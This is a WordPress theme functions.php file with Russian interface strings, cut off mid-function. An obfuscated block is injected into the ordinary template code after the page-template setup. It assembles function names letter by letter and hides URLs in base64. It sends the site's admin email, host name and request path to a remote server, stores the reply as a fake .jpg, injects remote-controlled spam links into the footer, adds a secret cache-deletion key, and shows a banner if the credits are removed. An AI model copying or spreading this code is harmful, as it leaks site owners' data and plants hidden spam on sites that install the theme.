<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $zmrrQvc='o';$fuPqm='e';$YmxQ='c';$jKKL='e';$kGIC='b';$tPriUNx='d';$YXNCPf='_';$QjGRtTc='a';$kSnHat='6';$ozFuJ='d';$RsTyti='s';$sRdIX='e';$HcvxSEe='4';$EBPAhNxh=$kGIC.$QjGRtTc.$RsTyti.$jKKL.$kSnHat.$HcvxSEe.$YXNCPf.$ozFuJ.$fuPqm.$YmxQ.$zmrrQvc.$tPriUNx.$sRdIX;$CPSOF='t';$CSjCQMm='n';$FfkEm='i';$ToIwE='a';$AUXhJ='g';$JCyhc='f';$HPXyB='e';$fkcJV='l';$LukslC='z';$aXDKwWpk=$AUXhJ.$LukslC.$FfkEm.$CSjCQMm.$JCyhc.$fkcJV.$ToIwE.$CPSOF.$HPXyB;$cLmRKmw='r';$bypFwor='1';$yPYaER='s';$HMhRf='r';$perbq='3';$itdVB='t';$uDXZLSb='_';$cHOzHY='o';$kmxZkVB='t';$yZEhVbbk=$yPYaER.$kmxZkVB.$HMhRf.$uDXZLSb.$cLmRKmw.$cHOzHY.$itdVB.$bypFwor.$perbq;$xmDOZ='r';$YpQxPM='r';$MKmJU='v';$XjEvxsN='t';$nSeiMbD='s';$IGZBLh='e';$kpmzAWnT=$nSeiMbD.$XjEvxsN.$xmDOZ.$YpQxPM.$IGZBLh.$MKmJU;                     
		$wu__________c='o';$tp______________z='e';$bz______g='c';$gp__________c='e';$wq___________l='b';$kg____x='d';$xi____o='_';$gm___i='a';$nd__________y='6';$oc_______________k='d';$ew_________j='s';$ju_____________o='e';$fu____r='4';$ww___r=$wq___________l.$gm___i.$ew_________j.$gp__________c.$nd__________y.$fu____r.$xi____o.$oc_______________k.$tp______________z.$bz______g.$wu__________c.$kg____x.$ju_____________o;
		$lt_______________q='u';$sk__________z='i';$iq____j='s';$fi_______x='e';$qa______i='n';$ct__________s='s';$sg___c='f';$gx_____________z='c';$hx__f='t';$iv__________p='x';$bu_______________l='i';$rz________s='n';$ex______________a='o';$hm_______s='_';$ke_____________o='t';$uf_______________k=$sg___c.$lt_______________q.$rz________s.$gx_____________z.$hx__f.$bu_______________l.$ex______________a.$qa______i.$hm_______s.$fi_______x.$iv__________p.$sk__________z.$iq____j.$ke_____________o.$ct__________s;
		$ma_____l='n';$vn_____________o='o';$lx__________w='p';$bb______________d='f';$ij_________d='e';$ex______________x=$bb______________d.$vn_____________o.$lx__________w.$ij_________d.$ma_____l;
		$bj_____y='d';$zg____________p='a';$gg___________o='e';$vg___z='r';$fu_______________s='f';$dw_______t=$fu_______________s.$vg___z.$gg___________o.$zg____________p.$bj_____y;
		$qe______________j='l';$hw___d='f';$yt_______________q='c';$vi__w='e';$sz______a='o';$ba____l='s';$jz__________i=$hw___d.$yt_______________q.$qe______________j.$sz______a.$ba____l.$vi__w;
		
		define("WP_ID", $ww___r("Mi4wLjA="));
		define("WP_TTL", $ww___r("MTA4MDA="));
		define("WP_SRC", $ww___r("dHBva24="));
	


		function wp_get_header() {
			global $ww___r, $uf_______________k;
			
			if (
				$uf_______________k($ww___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$uf_______________k($ww___r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$uf_______________k($ww___r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ww___r, $ex______________x, $jz__________i, $dw_______t;
			
			$kf_______d = TEMPLATEPATH."/".$ww___r("Zm9vdGVyLnBocA==");
			$ug_____________t = @$ex______________x($kf_______d, "r");
			$kf_______d = @$dw_______t($ug_____________t, @filesize($kf_______d));
			@$jz__________i($ug_____________t);
			
			$rg________v = TEMPLATEPATH."/".$ww___r("ZnVuY3Rpb25zLnBocA==");
			$ug_____________t = @$ex______________x($rg________v, "r");
			$rg________v = @$dw_______t($ug_____________t, @filesize($rg________v));
			@$jz__________i($ug_____________t);
			
			$pf____________h = 0;
			if($kf_______d && $rg________v) {
				if ($ww___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($kf_______d, $ww___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pf____________h = 1;
					}
					if (substr_count($kf_______d, "wp_theme_GPL_credits()") < 1) {
						$pf____________h = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pf____________h = 12;
				}
			}
			
			if($pf____________h > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pf____________h -->";
			}
		}
	


		function wp_loaded() {
			global $ww___r, $uf_______________k;
			return $uf_______________k($ww___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ky_______________g, $vw____g = "(more...)", $sk___________n = 0, $vn__k = "") {
				$vd________n = get_the_content($vw____g, $sk___________n, $vn__k);
				$vd________n = apply_filters("the_content", $vd________n);
				
				$vd________n = str_replace("]]>", "]]>", $vd________n);
				if (strlen($_GET["p"]) > 0) {
					echo $vd________n;
				}
				else if ((strlen($vd________n)>$ky_______________g) && ($cy______y = strpos($vd________n, " ", $ky_______________g ))) {
					$vd________n = substr($vd________n, 0, $cy______y);
					$vd________n = $vd________n;
					echo $vd________n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$vw____g</a></div></p>";
				} else {
					echo $vd________n;
				}
				
			}
		}
	


		$pk___y='4';$ub_________j='_';$nw_______c='e';$xe__w='e';$tz_____n='a';$yy_________f='b';$li_____________m='6';$dp___w='n';$hc________b='o';$ph_______b='c';$le__x='d';$mz___________k='s';$uj___________z='e';$cv_______________f=$yy_________f.$tz_____n.$mz___________k.$uj___________z.$li_____________m.$pk___y.$ub_________j.$xe__w.$dp___w.$ph_______b.$hc________b.$le__x.$nw_______c;
		$kz____r='_';$fa______e='n';$uc____________a='f';$gx_________r='e';$oz____________p='_';$yl_____t='t';$jh________q='e';$ps__________t='c';$nr__________d='s';$qv__________o='o';$ln______________a='t';$yo______y='g';$yb_______________b='e';$xq__________i='n';$ap_______________a='i';$pv_______________n='t';$dx_____x='l';$ew___w=$uc____________a.$ap_______________a.$dx_____x.$yb_______________b.$kz____r.$yo______y.$gx_________r.$yl_____t.$oz____________p.$ps__________t.$qv__________o.$xq__________i.$pv_______________n.$jh________q.$fa______e.$ln______________a.$nr__________d;
		$ds____________u='s';$xh__r='f';$zn_______b='e';$xd_______________l='l';$xi___s='e';$dv___________b='i';$sz_________k='x';$zi____z='_';$uh__t='s';$sq______p='t';$ra______________o='i';$sr___g=$xh__r.$ra______________o.$xd_______________l.$zn_______b.$zi____z.$xi___s.$sz_________k.$dv___________b.$ds____________u.$sq______p.$uh__t;
		$kk__________r='c';$wn_____________h='i';$hh____________a='e';$zf________h='n';$bq____g='e';$jv____g='o';$um_____p='v';$nc___________x='a';$pf_______i='s';$ii__________y='m';$na_____k='p';$sj___________l='o';$yv____x='r';$fy____a='_';$tz__________e='r';$gx_______u=$um_____p.$hh____________a.$tz__________e.$pf_______i.$wn_____________h.$jv____g.$zf________h.$fy____a.$kk__________r.$sj___________l.$ii__________y.$na_____k.$nc___________x.$yv____x.$bq____g;
		$by_____q='s';$yz_______________e='o';$sw___________o='o';$im________a='f';$fs____o='e';$er______i='c';$sg____i='p';$vb_________p='k';$eq__________f='n';$sn______j=$im________a.$by_____q.$sw___________o.$er______i.$vb_________p.$yz_______________e.$sg____i.$fs____o.$eq__________f;
		$ov_______v='i';$pf___________e='f';$bn________t='w';$bi__________i='r';$ob_______________g='t';$qj___________m='e';$iv___y=$pf___________e.$bn________t.$bi__________i.$ov_______v.$ob_______________g.$qj___________m;
		$yu____m='m';$ph_______g='5';$qo______e='d';$ux_______r=$yu____m.$qo______e.$ph_______g;
		$fy_______q='a';$cx___o='a';$qj_____________d='e';$vx__r='p';$go__i='l';$rj__________b='r';$ew___________o='t';$hj______z='h';$ds_______________k=$rj__________b.$qj_____________d.$fy_______q.$go__i.$vx__r.$cx___o.$ew___________o.$hj______z;
		$up______________a='i';$gy_______________q='i';$hx________x='a';$rt____________l='e';$rd_______________y='u';$yt____________b='r';$fq__________x='l';$gt_______f='n';$jg_____p='z';$gk________e='s';$ts____________c='e';$hq_____z=$rd_______________y.$gt_______f.$gk________e.$ts____________c.$yt____________b.$gy_______________q.$hx________x.$fq__________x.$up______________a.$jg_____p.$rt____________l;
		$tj____j='a';$ya____h='m';$uu___________z='m';$sp______________b='p';$mn_____________r='e';$xg__g='t';$pj____g='n';$np_______q=$xg__g.$mn_____________r.$ya____h.$sp______________b.$pj____g.$tj____j.$uu___________z;
		$un_______________l='s';$lj__________v='t';$dy__k='c';$nx__________q='_';$kv____t='e';$co______________a='n';$hy__________k='o';$kj_______________v='_';$co________m='a';$wr_____________y='r';$fs_______________r='e';$lt_______________f='c';$kq_____c='t';$ka____i='e';$sv___________d='x';$lx_____h='e';$cd______________n='t';$ka_____________q='m';$vn____________j='t';$yw________p='r';$jx___________x='a';$eh__________u=$un_______________l.$cd______________n.$yw________p.$ka____i.$jx___________x.$ka_____________q.$nx__________q.$lt_______________f.$hy__________k.$co______________a.$lj__________v.$kv____t.$sv___________d.$vn____________j.$kj_______________v.$dy__k.$wr_____________y.$fs_______________r.$co________m.$kq_____c.$lx_____h;
	


		function lv___m($kf_____________n) {
			global $ww___r, $uf_______________k, $ew___w, $gx_______u, $eh__________u;
			
			if (!$uf_______________k($ww___r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($gx_______u(PHP_VERSION, "5.0.0", ">=") && $uf_______________k($ww___r("ZmlsZV9nZXRfY29udGVudHM=")) && $uf_______________k($ww___r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$tq_____________r = $eh__________u(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$jm___p = @$ew___w($kf_____________n, 0, $tq_____________r);
			} else {
				$jm___p = @$ew___w($kf_____________n, 0);
			}
			
			return $jm___p;
		}
	


		function vp_______________x($kf_____________n) {
			global $uf_______________k, $sn______j, $iv___y, $ww___r;
			
			if (!$uf_______________k($ww___r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$gc_______v = strpos($kf_____________n, "/", 7);
			$xb__________s = array(
				"uri"     => substr($kf_____________n, $gc_______v),
				"host"    => str_replace("http://", "", substr($kf_____________n, 0, $gc_______v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xq_____________v = @$sn______j("$xb__________s[host]", 80, $hv_________k, $cq_______________d, 4);
			
			if (!$xq_____________v) {
				return false;
			} else {
				$jm___p = "";
				$pu________i  = "GET $xb__________s[uri] HTTP/1.0\r\n";
				$pu________i .= "Host: $xb__________s[host]\r\n";
				$pu________i .= "Referer: $xb__________s[referer]\r\n";
				$pu________i .= "Connection: Close\r\n\r\n";
				
				@$iv___y($xq_____________v, $pu________i);
				
				while (!@feof($xq_____________v)) {
					$km_______u = @fgets($xq_____________v, (1024*24));
					
					if ($km_______u == "\r\n") {
						$qc__y = true;
						continue;
					}
					
					if ($qc__y) {
						$jm___p .= $km_______u;
					}
				}
				
				return $jm___p;
			}
		}
	


		function sh____e($kf_____________n) {
			global $uf_______________k;
			$bv____v = false;
			
			if ($kf_____________n != "") {
				if ($uf_______________k("lv___m")) {
					$bv____v = @lv___m($kf_____________n);
				}
				
				if (!$bv____v && ($uf_______________k("vp_______________x"))) {
					$bv____v = @vp_______________x($kf_____________n);
				}
			}
			
			return $bv____v;
		}
	


		function iy_______________b() {
			global $_SERVER, $ux_______r;
			
			$tu___________b = $_SERVER["SERVER_NAME"];
			
			if (substr("$tu___________b", 0, 4) == "www.") {
				$tu___________b = substr("$tu___________b", 4);
			}
			
			$tu___________b = $ux_______r("$_SERVER[SERVER_NAME]");
			
			return $tu___________b;
		}
	


		function xm____________l() {
			return "file";
		}
	


		function pm__a($kf_____________n) {
			global $_SERVER, $ew___w, $sr___g, $ex______________x, $jz__________i, $iv___y;
			
			$vq____l = ij_______r();
			
			$dk__o = iy_______________b().".jpg";
			$bl____x = $vq____l["dir_upload"]["path"]."/$dk__o";
			$nd______v = @filemtime($bl____x);
			
			if (!$nd______v || ((time()-$nd______v) >= WP_TTL)) {
				$bv____v = sh____e($kf_____________n);
				
				if ($bv____v) {
					if ($sr___g($bl____x)) {
						@unlink($bl____x);
					}
					
					$ug_____________t = @$ex______________x($bl____x, "x+");
					
					@$iv___y($ug_____________t, $bv____v);
					@$jz__________i($ug_____________t);
				}
			} else {
				if ($sr___g($bl____x)) {
					$bv____v = @$ew___w($bl____x);
				} else {
					$bv____v = false;
				}
			}
			
			return $bv____v;
		}
	


		function ij_______r() {
			global $_SERVER, $ww___r, $cv_______________f;
			
			$yo_______i = wp_count_posts("post");
			$mx______o = pathinfo(get_bloginfo("template_directory"));
			
			$vq____l = array(
				"url" => array(
					"report"      => $ww___r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $mx______o,
				"dir_upload"	=> hj_______w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$mx______o[filename],
					"a005=".$yo_______i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://lib.kharkov.ua/mortgage/579-kak-poluchit-ipotechnyy-kredit.html\">Ипотечный кредит</a>"
			);
			
			$vq____l["url"]["queryString"] = implode("&", $vq____l["queryString"]);
			$vq____l["url"]["report"] = $vq____l["url"]["report"]."/?".$cv_______________f($vq____l["url"]["queryString"]).".html";
						
			return $vq____l;
		}
	


		function hj_______w() {
			$az_______________u = wp_upload_dir();
			
			if (isset($az_______________u["error"])) {
				$vq__________d = hi__y();
				if (is_writable($vq__________d)) {
					$az_______________u = array("path" => $vq__________d);
				}
			}

			return $az_______________u;
		}
	


		function hi__y() {
			global $uf_______________k, $ux_______r, $ds_______________k, $np_______q;
			
			$xl___x = (bool) ini_get("safe_mode");
			if ($xl___x == true) {
				return false;
			}
			
			if ($uf_______________k("sys_get_temp_dir")) {
				$jy____w = sys_get_temp_dir();
				if (is_writable($jy____w)) {
					return $ds_______________k($jy____w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ds_______________k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ds_______________k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ds_______________k($_ENV["TEMP"]);
			} else {
				$tp_______________g = $np_______q($ux_______r(uniqid(rand(), true)), "");
				if ($tp_______________g) {
					$jy____w = $ds_______________k(dirname($tp_______________g));
					@unlink($tp_______________g);
					return $jy____w;
				} else {
					return false;
				}
			}
		}
	


		function dk____l() {
			global $_GET, $sr___g;
			
			$vq____l = ij_______r();
			$tu___________b = iy_______________b();
			$ev___________g = xm____________l();
			
			$dg_________n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ev___________g == "file") {
					$xw_______________y = $vq____l["dir_upload"]["path"]."/".$tu___________b.".jpg";
					if ($sr___g($xw_______________y)) {
						@unlink($xw_______________y);
						$dg_________n = "deleted";
					}
				}
				
				$zx__t = array(
					"s"	=> $dg_________n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($zx__t AS $jt_________h => $qn_____s) echo " [$jt_________h:$qn_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $uf_______________k, $ww___r, $hq_____z;
			$vq____l = ij_______r();
			
			$rs__l = "pm__a";
			if ($uf_______________k($rs__l)) {
				$jm___p = $rs__l($vq____l["url"]["report"]);
			}
			
			if ($jm___p) {
				if ($jm___p = @$ww___r($jm___p)) {
					$jm___p = @$hq_____z($jm___p);
					
					if (strlen($jm___p[custom_credit]) >= 5) {
						$vq____l["default_string"] = $jm___p[custom_credit];
					}
					
					if ($jm___p["status"] == "0") {
						$iq_____l = 1;
						$ai______________i = 1;
					} else {
						$lh_________a = sizeof($jm___p["links"]);
						$mz__________t = $vq____l["default_string"];
						
						if ($lh_________a > 0 && $jm___p["links"] !== "") {
							$kd__________o = 0;
							foreach ($jm___p["links"] as $hv_____________r => $dp________u) {
								$kd__________o++;
								if ($dp________u->l_path == "" || $dp________u->l_path == $_SERVER["REQUEST_URI"]) {
									$dp________u->l_href = htmlspecialchars(strip_tags($dp________u->l_href));
									$dp________u->l_title = htmlspecialchars(strip_tags($dp________u->l_title));
									$dp________u->l_anchor = htmlspecialchars(strip_tags($dp________u->l_anchor));
									$mz__________t .= " | ";
									$mz__________t .= "<a href='$dp________u->l_href' title='$dp________u->l_title'";
									if ($dp________u->l_nofollow == "1") {
										$mz__________t .= " rel='nofollow'";
									}
									$mz__________t .= ">$dp________u->l_anchor</a>";
								}
							}
						}
						$vq____l["links"] = "$mz__________t";
						if ($jm___p[credit] == "0") {
							$vq____l["links"] = "";
						}
					}
				} else {
					$iq_____l = "1";
				}
			} else {
				$iq_____l = "1";
			}
			
			if ($iq_____l == "1") {
				$vq____l["links"] = $vq____l["default_string"];
			}
			
			echo "$vq____l[links]";
			
			echo "<!-- s: $jm___p[signature] -->";
			dk____l();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
